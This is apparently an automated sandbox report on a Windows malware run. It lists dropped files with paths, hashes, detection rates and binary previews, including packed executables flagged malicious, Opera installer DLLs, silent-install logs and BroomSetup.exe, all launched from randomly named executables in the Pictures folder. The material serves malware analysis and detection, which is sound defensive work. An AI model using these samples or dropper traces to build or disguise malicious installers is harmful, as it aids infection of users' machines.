                                                                                                                          SHA-512:13FE777F01E5C540BCEE2BA26DE2FCF577ABC57CD321D704B0FADD736DA03AEA6ECA288B600217D2A702310AA3BB5F73204F90816C0769582F4BB926BCE9337E
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@..........................................................................b...........................)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\xzRRQmj1LpBxF1iTy72H1YWe.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.7684781715563425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:WnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH+:FWqlkLESgCRE/vhOjb05efd6e/oXH+
                                                                                                                          MD5:BCC38593B03EE04D072E36C9513BCF54
                                                                                                                          SHA1:23C84983EAB71EFBC7615B0E60A67D0D1C3A62D4
                                                                                                                          SHA-256:6B6A921F87E6FCC245DE2BADD36F3276B8A6662BBA129EDE2BE971FCF472FB8C
                                                                                                                          SHA-512:F6C75DDFB5B82466BC8271B4D6BA2B2AAC093F7F67C92C4AB0370C2FF15793BBC62170FC891836BB2B30EAC431F2302CC8B75AA6BA77E974F2F85FCC5A693241
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....8v-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085307048.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:ASCII text, with very long lines (521)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3697
                                                                                                                          Entropy (8bit):5.631742289964414
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:VbqfKtbXtbNtbd8tbstbntbitb5Rs3tbDWUcVBYVPYQCERLPs3GFIqb7LdL3TKAE:VqexH3RLUSR8Kmeia+X5glVX5gl0NXa
                                                                                                                          MD5:051C911A844BBA0738765015F2CE104C
                                                                                                                          SHA1:23755CCCAF238E4546B5DCABF8E96BBBBE75FF3F
                                                                                                                          SHA-256:49C9181AA5A83C4DBC119336E79F1BE40E9345C1738C8496C50DCDECF8D947E9
                                                                                                                          SHA-512:0CECA5CE4BD342E939A3B297ABA4FE5344EE823369BE3F11E778E398EAD4889E892F99FF1316F8FCAE4CDA9ABE5C3E0804540BA6EF82E00585F8205A70B8644B
                                                                                                                          Malicious:false
                                                                                                                          Preview:[0312/085307.063:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/085307.063:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0.[0312/085307.063:INFO:installer_main.cc(480)] Uninstall:0.[0312/085307.063:INFO:installer_main.cc(481)] Silent:1.[0312/085307.063:INFO:installer_main.cc(482)] Run Immediately0.[0312/085307.063:INFO:installer_main.cc(484)] Backend0.[0312/085307.063:INFO:installer_main.cc(485)] Inside package0.[0312/085307.063:INFO:installer_main.cc(486)] Autoupdate:0.[0312/085307.063:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/085307.063:INFO:installer_main.cc(636)] Tracking data: NTMyMmI3Y2E1N2MyZmY1NDJiNjUwNDg0Yzg1ZDJhNDMzMTYyOGI2OGYxOTQ2YTZjMGM5OTUwMGJkOGI2ZjExODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085318383.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
                                                                                                                          File Type:ASCII text, with very long lines (521)
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):3803
                                                                                                                          Entropy (8bit):5.594577145237454
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:flkxT45EipPtGed4cfGpX5glgX5glbN6RL:flkt4pOt95gm5gJ6
                                                                                                                          MD5:98F2A52A6C525B87109865EA38C5747A
                                                                                                                          SHA1:3B9A778C22C2DCB1E1654E0661963B921FF95524
                                                                                                                          SHA-256:BECEB6E796C330917C98396D643BDDBD6DC964F5428C7F18226318E2775F9181
                                                                                                                          SHA-512:3FC86C5CD06AB7A87BFDCFD24858D5599205BBDA2DD9D8444EBFA35A340B00512AD63CAFDF66474EF74BAA3B4B8BABE8B24DB4CAB9C51250A5FD415074031242
                                                                                                                          Malicious:false
                                                                                                                          Preview:[0312/085318.383:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/085318.383:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0.[0312/085318.383:INFO:installer_main.cc(480)] Uninstall:0.[0312/085318.383:INFO:installer_main.cc(481)] Silent:1.[0312/085318.383:INFO:installer_main.cc(482)] Run Immediately0.[0312/085318.383:INFO:installer_main.cc(484)] Backend0.[0312/085318.383:INFO:installer_main.cc(485)] Inside package0.[0312/085318.383:INFO:installer_main.cc(486)] Autoupdate:0.[0312/085318.383:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/085318.383:INFO:installer_main.cc(636)] Tracking data: NGIzYzZhZDljNjZkMWUwYTI0ZWFiZTk0ZmNkYTFhNjAxODYyOTI2YWRlODdjMjBhZjg2ZjZkMWYwZWY2Mjk5Yzp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085332766.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
                                                                                                                          File Type:ASCII text, with very long lines (521)
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):3889
                                                                                                                          Entropy (8bit):5.605180960286787
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:PbqfKnb5FnbNnbd8nbsnbnnbinb5bs3nbuLcVBYVPwCAC53CjFCtqCd7LdL3CdKf:1Yp7xwq5ycrjKeRmX5glR6X5glIcNH
                                                                                                                          MD5:D9DD9A174B1CB1646783CA8893EBE720
                                                                                                                          SHA1:E275272FB7E0AF4407E44C8A1DFC5EFF2BB41DB9
                                                                                                                          SHA-256:79933DC0EA7ADF49FB9CBB01D8143EB283441CC674242DE6FD70C54C7FF73D49
                                                                                                                          SHA-512:472E8F33573AB80FCF0E8F395B94D4FCDC20A8EE2FDCB440FB768D1CFB1D2E956F776B2DE4B42225F6E67120978E701095C292FAF18929EEF214387AF3CE352F
                                                                                                                          Malicious:false
                                                                                                                          Preview:[0312/085332.766:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/085332.766:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0.[0312/085332.766:INFO:installer_main.cc(480)] Uninstall:0.[0312/085332.766:INFO:installer_main.cc(481)] Silent:1.[0312/085332.766:INFO:installer_main.cc(482)] Run Immediately0.[0312/085332.766:INFO:installer_main.cc(484)] Backend0.[0312/085332.766:INFO:installer_main.cc(485)] Inside package0.[0312/085332.766:INFO:installer_main.cc(486)] Autoupdate:0.[0312/085332.766:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/085332.766:INFO:installer_main.cc(636)] Tracking data: ZDI5YmQxMjlhNWNiNzZhMjliNmY3MDE5NWMwYjE3NjUwYzlhZmEzNzNmZDM2MjA3MGJmYTY4ODgxMDE0YmE1Mjp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085338724.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe
                                                                                                                          File Type:ASCII text, with very long lines (521)
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):3626
                                                                                                                          Entropy (8bit):5.633179578975675
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:rbqfKTbUTbNTbd8TbsTbnTbiTb53s3TbBcVBYVPOCkyW3MF+qQ7LdL3SKAZSfzPK:m86xODlceBIiX5glTX5glvNmv
                                                                                                                          MD5:1501E78B020D2B32A52443C1C4D2ADA2
                                                                                                                          SHA1:D0D798B693B3A86E185561BA42907EFA3860F074
                                                                                                                          SHA-256:3A21FF3E91760B9DCDECCB1460510B0BEDAF2F7D8EB7F503315CB0D2FCE9E82A
                                                                                                                          SHA-512:0CB91712E16439CBED02D829FD5E654BF81CEE34BBFE6492D157AACB36206B04E0E51F8772E701A7022E232D1C6E3E2CEBD528691226C7408D7109B9C57037F2
                                                                                                                          Malicious:false
                                                                                                                          Preview:[0312/085338.724:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/085338.724:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0.[0312/085338.724:INFO:installer_main.cc(480)] Uninstall:0.[0312/085338.724:INFO:installer_main.cc(481)] Silent:1.[0312/085338.724:INFO:installer_main.cc(482)] Run Immediately0.[0312/085338.724:INFO:installer_main.cc(484)] Backend0.[0312/085338.724:INFO:installer_main.cc(485)] Inside package0.[0312/085338.724:INFO:installer_main.cc(486)] Autoupdate:0.[0312/085338.724:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/085338.724:INFO:installer_main.cc(636)] Tracking data: MjljNGZlODRiZTgxOTYzZDIyMDI5OTkyZDUzMzMzMDZmM2FjMDkzM2I2YTdjZTMxNDJjZWYzMTU5ZjdhZjExZjp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2

                                                                                                                          C:\Users\user\AppData\Local\Temp\BroomSetup.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1828864
                                                                                                                          Entropy (8bit):7.40381475947401
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:YUnaQiKJ8N+AadA6mICFhNGffVCPi9NUko6jE:ZwKa+u6mICFSwPKDK
                                                                                                                          MD5:EEE5DDCFFBED16222CAC0A1B4E2E466E
                                                                                                                          SHA1:28B40C88B8EA50B0782E2BCBB4CC0F411035F3D5
                                                                                                                          SHA-256:2A40E5DCCC7526C4982334941C90F95374460E2A816E84E724E98C4D52AE8C54
                                                                                                                          SHA-512:8F88901F3EBD425818DB09F268DF19CCF8A755603F04E9481BCF02B112A84393F8A900EAD77F8F971BFA33FD9FA5636B7494AAEE864A0FB04E3273911A4216DC
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...F..^.................P........7.@YN...7..`N...@...........................S..................@....................<.......R.@....`N......................................................[N...............................<.....................UPX0......7.............................UPX1.....P....7..L..................@....rsrc........`N......P..............@..............................................................................................................................................................................................................................................................................................................................................................................4.22.UPX!....

                                                                                                                          C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530026645880.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530527645904.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530974345608.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531585744560.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531803244640.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Opera_installer_2403120753276464480.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\file.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):500000
                                                                                                                          Entropy (8bit):6.021986548032622
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:8HPIkbNcJ6+M+pP4LRgnU1ICrxUqLsxy06Gm856Xorx9ioQbOF/rPsgTtprZP4FR:cPNcsiFU1bxUyXGHlWbOF/rPsgTX2Xz
                                                                                                                          MD5:932F74E39CA5186F60BC9349C38DDA42
                                                                                                                          SHA1:40540CF3ACC0541FE471259BE690AB3CE36EA13E
                                                                                                                          SHA-256:33F115D30E946FBF55BCAE827EC929F0E3DB56CEC856AC04ED4027DF38F70300
                                                                                                                          SHA-512:D2EB3C07C5F81F30B3CB158675BDA8D5587ADA41BE520C7A32713DC467E2FC421E66EB9316DDB4A43834EC3AD71D5E56F505E4180BB4055883224D5A1BE32395
                                                                                                                          Malicious:false
                                                                                                                          Preview:62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa.NdkIBX7R0MXI/fz98B1G7Pj5EkToaaPHCnfPQ01B3yzo5ZQLm0Y6S/bZwQJ+1O3ua2jO3QslgyVX.0sCO32ZP26v5QpkgPMfQ6LYGfvPw/Z3yBcqZFGQYw5cUpLlOshrhokH3lYs/qr6OjQ02dt2FiG4c.j7nkEUF7P0yh1yFbK6aBHgYiliOsBF11EMx+QWETtPXLfm3WuhyrvcvmBVVi45ayu5vhYo3oTsVs.OnkiYR/v2VjJwSdl7Kwrba3P5cdHh7BefANDi2bGIoafnRn98g4YQtRVgpEQbRULAKJNlIkZjdJa.Q5jw67IDhIDvGxIDdsmr3NOfK/1xuB0at4WFtSvfmJbDum3LacnP4SOeajoPR3rYY1pS6Fg63beJ.RT68kEmTT01eX9bR7KlAuZEj+RDHjsH7c6E10J+z/c2WT1JVqt1kQ1vnUuLi4g9s7asdr8YvGbO5.rnXEUPJmT1wPdrwZUqzoVeZcfjwzkxU96Z3n16J4+lDfw9EXNzQL+M9bLjDDbV1DlWDH8Z9BCxwC.I2JS6ZgnO6lW9qQoOJGp846lYKOogT7bQ7/7BXP+SVKAiBEKhDbX4tfJQT7LvybURsdyt8CH60yU.n6Twu9oiay1ghXYuOEDteKMxfnC3CblbhJtfmTzWoMzg2bQvBKh0DncbCHid49SQkuH+dkCB4CC0.Z3g+r0uRLhtnIfRPToXE8fAQCgSIZYX93cP6ycyQfDC3hP2aqiikKrTeG4asHtXPbnk4bk+GLpuH.6zmu6TKxdRN7RrDgptIGObZxEVKJp35t4sSK7s0TKo3EPakM6AmqpbOwbeSlVU7LAkgj2CDX1gJi.l2hmltKpfpQLAz06AhhRGFk28JMl8O91NhI/y/UwYiMU6jqSTP8FmWGOEgSVUAdUa2HFX441kJ4Z

                                                                                                                          C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):706560
                                                                                                                          Entropy (8bit):6.506349797654815
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+LIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CECqMRU
                                                                                                                          MD5:F1EEAE7DAB5E51B2A76DB6651423C9F5
                                                                                                                          SHA1:19F6866BF1FC50DF4228025295D9E7CE6FD63A4B
                                                                                                                          SHA-256:36B8BAC6A19889B5A5AA1E91C1D1D561BBCAB86771DE787D55B1987C94C274B8
                                                                                                                          SHA-512:6423E0C42D5F16C9C74E1A5BCA86F6893186FB95F015EAED9FAA805278D60F334827D06911E671DD4554E10A31AFD4714DB7A6D63AFBBCFE5F31E2F02E416E53
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

